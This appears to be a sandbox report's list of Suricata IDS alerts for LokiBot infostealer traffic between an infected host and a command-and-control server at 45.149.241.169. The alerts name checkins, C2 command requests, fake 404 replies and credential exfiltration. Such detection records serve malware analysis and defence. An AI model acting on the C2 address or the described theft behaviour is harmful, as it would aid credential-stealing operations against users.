Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.11:49711 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64389
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64384
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64354
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64379
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64391
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64350
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64352 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64387
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49715 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64368 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64362 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64402
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64365 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64365 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64404
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64422 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64365 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64422 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64395
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64398
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64422 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64422 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64422 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64422
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49712 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49712 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49712 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.11:49712 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64407
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64420
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64367
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64435
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64410
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64365 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64365 -> 45.149.241.169:80
